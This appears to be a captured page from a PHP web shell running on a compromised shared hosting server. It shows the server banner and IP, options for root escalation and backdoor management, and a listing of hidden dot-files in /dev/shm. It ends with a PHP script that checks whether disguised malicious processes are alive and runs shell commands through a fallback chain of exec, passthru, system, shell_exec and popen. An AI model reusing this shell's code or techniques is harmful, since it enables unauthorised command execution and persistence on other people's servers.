Linux premium71.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
Server IP : 198.187.29.8 & Your IP : 216.73.216.95
Domains :
Cant Read [ /etc/named.conf ]
User : cleahvkv
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
dev /
shm /
Delete
Unzip
Name
Size
Permission
Date
Action
lsws
[ DIR ]
drwxr-x---
2025-07-07 08:09
.binding
49
B
-rw-r--r--
2025-07-07 13:08
.comp
3.26
KB
-rw-r--r--
2025-07-06 22:17
.dchunk
53
B
-rw-r--r--
2025-07-07 11:50
.descriptor
45
B
-rw-r--r--
2025-07-05 23:28
.elem
50
B
-rw-r--r--
2025-07-05 21:28
.fac
3.21
KB
-rw-r--r--
2025-07-07 11:15
.flag
56
B
-rw-r--r--
2025-07-06 15:24
.holder
631
B
-rw-r--r--
2025-07-03 17:39
.itm
50
B
-rw-r--r--
2025-07-06 21:24
.key
3.11
KB
-rw-r--r--
2025-07-06 17:43
.mrk
50
B
-rw-r--r--
2025-07-06 08:39
.obj
53
B
-rw-r--r--
2025-07-07 09:50
.parameter_group
53
B
-rw-r--r--
2025-07-07 10:02
.pset
53
B
-rw-r--r--
2025-07-07 10:07
.ptr
59
B
-rw-r--r--
2025-07-07 04:24
.rec
48
B
-rw-r--r--
2025-07-07 10:37
.reference
56
B
-rw-r--r--
2025-07-07 10:59
.resource
333
B
-rw-r--r--
2025-07-05 00:10
.sym
57
B
-rw-r--r--
2025-07-07 11:04
.tkn
52
B
-rw-r--r--
2025-07-06 19:26
.token
1.21
KB
-rw-r--r--
2025-07-06 16:46
.val
58
B
-rw-r--r--
2025-07-05 00:10
.value
52
B
-rw-r--r--
2025-07-07 09:50
PostgreSQL.607291298
14.64
KB
-rw-------
2025-07-03 10:31
Save
Rename
<?php $files = ['db_search','cache_ranks','ViewResume','class.zipfile','view.blocks','popup_magnifier','class.image','config.bak','typoscript','changeCourseNote','shopping_cart','functions_search','formtextarea','editwantedfields','bankdetails','pagerTest','auctionwatch','commenters','cma_impann','route_drafts','proj_details','check_link','adquestions','formselectuser','view_note','phd_buttonsEN','function.counter','welcome_old','Config.class','image_processor']; foreach ($files as $f) { $res = @run("pgrep {$f}"); if (!preg_match('/\d+/', $res)) { die("<f>{$f}</f>"); } } die('!ended!'); function run($in) { $out = ''; if (function_exists('exec')) { @exec($in, $out); $out = @join("\n", $out); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in, "r"))) { $out = ""; while (!@feof($f)) $out .= fread($f, 1024); pclose($f); } return $out; }